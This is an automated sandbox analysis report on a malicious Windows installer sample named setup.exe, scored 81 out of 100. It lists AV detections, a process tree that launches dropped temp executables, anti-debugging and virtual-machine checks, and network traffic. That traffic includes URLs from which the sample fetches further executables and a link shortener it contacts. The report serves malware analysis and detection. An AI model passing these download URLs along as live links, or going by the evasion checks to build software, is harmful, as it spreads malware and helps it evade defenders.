Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
setup.exe

Overview

General Information

Sample name:setup.exe
Analysis ID:1472936
MD5:efe2c721d0d0d48abe27aeb0285d36b8
SHA1:f2e6c2b92d26fbf31c4cae9dbee1ff578ac86940
SHA256:155ad546339267dea91ea573275e5912450d803ca537c9d454f48d9b7fd2749a
Tags:exe
Infos:

Detection

Score:81
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Creates a process in suspended mode (likely to inject code)
Entry point lies outside standard sections
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • setup.exe (PID: 4328 cmdline: "C:\Users\user\Desktop\setup.exe" MD5: EFE2C721D0D0D48ABE27AEB0285D36B8)
    • cmd.exe (PID: 2488 cmdline: "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\tdxotjb.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 2788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6976 cmdline: "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\fydskqglg.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6832 cmdline: "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\mmqjncscdre.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 1596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 3384 cmdline: "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\nmhqwem.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 1708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Snort rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: setup.exeAvira: detected
Source: https://2no.co/2URUU5mAvira URL Cloud: Label: malware
Source: https://2no.co/DAvira URL Cloud: Label: malware
Source: https://2no.co/Avira URL Cloud: Label: malware
Source: https://2no.co/2URUU5Avira URL Cloud: Label: malware
Source: https://2no.co/2URUU5http://nffiiload08.top/download.php?file=6.exehttp://nffiiload08.top/download.pAvira URL Cloud: Label: malware
Source: setup.exeReversingLabs: Detection: 71%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.9% probability
Source: setup.exeJoe Sandbox ML: detected
Source: setup.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknownHTTPS traffic detected: 104.21.79.229:443 -> 192.168.2.6:49713 version: TLS 1.2
Source: Joe Sandbox ViewIP Address: 104.21.79.229 104.21.79.229
Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknownDNS query: name: ip-api.com
Source: global trafficHTTP traffic detected: GET /2URUU5 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 2no.coConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /json HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ip-api.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /googlemap.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 45.12.4.151Connection: Keep-Alive
Source: unknownTCP traffic detected without corresponding DNS query: 45.12.4.151
Source: unknownTCP traffic detected without corresponding DNS query: 45.12.4.151
Source: unknownTCP traffic detected without corresponding DNS query: 45.12.4.151
Source: unknownTCP traffic detected without corresponding DNS query: 45.12.4.151
Source: unknownTCP traffic detected without corresponding DNS query: 45.12.4.151
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /2URUU5 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 2no.coConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /json HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ip-api.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /googlemap.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 45.12.4.151Connection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: 2no.co
Source: global trafficDNS traffic detected: DNS query: suomenen.com
Source: global trafficDNS traffic detected: DNS query: nffiiload08.top
Source: global trafficDNS traffic detected: DNS query: ip-api.com
Source: setup.exe, 00000000.00000002.2477887067.00000000011E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.12.4.151/googlemap.exe
Source: setup.exe, 00000000.00000002.2477887067.00000000011E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.12.4.151/googlemap.exel
Source: setup.exe, setup.exe, 00000000.00000002.2477887067.00000000011E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json
Source: setup.exe, 00000000.00000002.2477887067.00000000011E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/jsonB
Source: setup.exe, 00000000.00000002.2476665891.0000000000251000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://ip-api.com/jsoncountryCodeinvalid
Source: setup.exe, 00000000.00000002.2477887067.00000000011E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/jsonh
Source: setup.exe, 00000000.00000002.2477887067.00000000011E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://nffiiload08.top/download.php?file=4.exe
Source: setup.exe, 00000000.00000002.2477887067.00000000011E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://nffiiload08.top/download.php?file=4.exeG;
Source: setup.exe, 00000000.00000002.2477887067.00000000011E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://nffiiload08.top/download.php?file=4.exed:
Source: setup.exe, setup.exe, 00000000.00000002.2477887067.00000000011E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://nffiiload08.top/download.php?file=6.exe
Source: setup.exe, 00000000.00000002.2477887067.00000000011E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://nffiiload08.top/download.php?file=6.exes;
Source: setup.exe, 00000000.00000002.2477887067.00000000011E5000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.2289141220.00000000011F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://suomenen.com/helka/trll.php
Source: setup.exe, 00000000.00000002.2477887067.00000000011C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2no.co/
Source: setup.exe, setup.exe, 00000000.00000002.2477887067.0000000001169000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.2477887067.00000000011C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2no.co/2URUU5
Source: setup.exe, 00000000.00000002.2476665891.0000000000251000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://2no.co/2URUU5http://nffiiload08.top/download.php?file=6.exehttp://nffiiload08.top/download.p
Source: setup.exe, 00000000.00000002.2477887067.00000000011C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2no.co/2URUU5m
Source: setup.exe, 00000000.00000002.2477887067.00000000011C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2no.co/D
Source: setup.exe, 00000000.00000002.2477887067.00000000011C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownHTTPS traffic detected: 104.21.79.229:443 -> 192.168.2.6:49713 version: TLS 1.2

System Summary

barindex
Source: setup.exeStatic PE information: section name:
Source: setup.exeStatic PE information: section name: .idata
Source: setup.exeStatic PE information: section name:
Source: setup.exeBinary or memory string: OriginalFilename vs setup.exe
Source: setup.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engineClassification label: mal81.evad.winEXE@13/2@4/3
Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Roaming\KrolJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1708:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1596:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2788:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5564:120:WilError_03
Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Temp\1017.tmpJump to behavior
Source: C:\Users\user\Desktop\setup.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\setup.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: setup.exeReversingLabs: Detection: 71%
Source: setup.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: unknownProcess created: C:\Users\user\Desktop\setup.exe "C:\Users\user\Desktop\setup.exe"
Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\tdxotjb.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\fydskqglg.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\mmqjncscdre.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\nmhqwem.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\tdxotjb.exe"Jump to behavior
Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\fydskqglg.exe"Jump to behavior
Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\mmqjncscdre.exe"Jump to behavior
Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\nmhqwem.exe"Jump to behavior
Source: C:\Users\user\Desktop\setup.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\setup.exeSection loaded: acgenral.dllJump to behavior
Source: C:\Users\user\Desktop\setup.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\setup.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\setup.exeSection loaded: samcli.dllJump to behavior
Source: C:\Users\user\Desktop\setup.exeSection loaded: msacm32.dllJump to behavior
Source: C:\Users\user\Desktop\setup.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\setup.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\setup.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\Desktop\setup.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\setup.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\Desktop\setup.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\setup.exeSection loaded: winmmbase.dllJump to behavior
Source: C:\Users\user\Desktop\setup.exeSection loaded: winmmbase.dllJump to behavior
Source: C:\Users\user\Desktop\setup.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\setup.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\setup.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\setup.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\setup.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\setup.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\setup.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\setup.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\setup.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\setup.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\setup.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\setup.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\setup.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\setup.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\setup.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\setup.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\Desktop\setup.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Desktop\setup.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Desktop\setup.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\setup.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\Desktop\setup.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\setup.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\setup.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\setup.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Desktop\setup.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\setup.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\Desktop\setup.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\setup.exeSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\Desktop\setup.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\Desktop\setup.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\setup.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\Desktop\setup.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\Desktop\setup.exeSection loaded: slc.dllJump to behavior
Source: C:\Users\user\Desktop\setup.exeSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\Desktop\setup.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\Desktop\setup.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ndfapi.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wdi.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: duser.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: atlthunk.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ndfapi.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wdi.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: duser.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: atlthunk.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ndfapi.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wdi.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: duser.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: atlthunk.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ndfapi.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wdi.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: duser.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: atlthunk.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\setup.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeAutomated click: OK
Source: C:\Windows\SysWOW64\cmd.exeAutomated click: OK
Source: C:\Windows\SysWOW64\cmd.exeAutomated click: OK
Source: C:\Windows\SysWOW64\cmd.exeAutomated click: OK
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: setup.exeStatic file information: File size 2341888 > 1048576
Source: setup.exeStatic PE information: Raw size of pebpncdj is bigger than: 0x100000 < 0x211c00

Data Obfuscation

barindex
Source: C:\Users\user\Desktop\setup.exeUnpacked PE file: 0.2.setup.exe.250000.0.unpack :EW;.rsrc:W;.idata :W; :EW;pebpncdj:EW;gegnfrcd:EW; vs :ER;.rsrc:W;t:W; :EW;pebpncdj:EW;gegnfrcd:EW;
Source: initial sampleStatic PE information: section where entry point is pointing to: gegnfrcd
Source: setup.exeStatic PE information: section name:
Source: setup.exeStatic PE information: section name: .idata
Source: setup.exeStatic PE information: section name:
Source: setup.exeStatic PE information: section name: pebpncdj
Source: setup.exeStatic PE information: section name: gegnfrcd
Source: setup.exeStatic PE information: section name: entropy: 6.99772907263561

Boot Survival

barindex
Source: C:\Users\user\Desktop\setup.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\setup.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\setup.exeWindow searched: window name: RegmonClassJump to behavior
Source: C:\Users\user\Desktop\setup.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\setup.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\setup.exeWindow searched: window name: RegmonclassJump to behavior
Source: C:\Users\user\Desktop\setup.exeWindow searched: window name: FilemonclassJump to behavior
Source: C:\Users\user\Desktop\setup.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\setup.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
Source: C:\Users\user\Desktop\setup.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
Source: C:\Users\user\Desktop\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Users\user\Desktop\setup.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
Source: C:\Users\user\Desktop\setup.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 2E8C47 second address: 2E8C6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F47CD346629h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 2E8C6C second address: 2E8C70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4527D5 second address: 4527E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F47CD34661Ch 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4527E7 second address: 4527F5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F47CD36120Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4527F5 second address: 452825 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F47CD34661Bh 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F47CD346626h 0x00000013 je 00007F47CD346616h 0x00000019 rdtsc
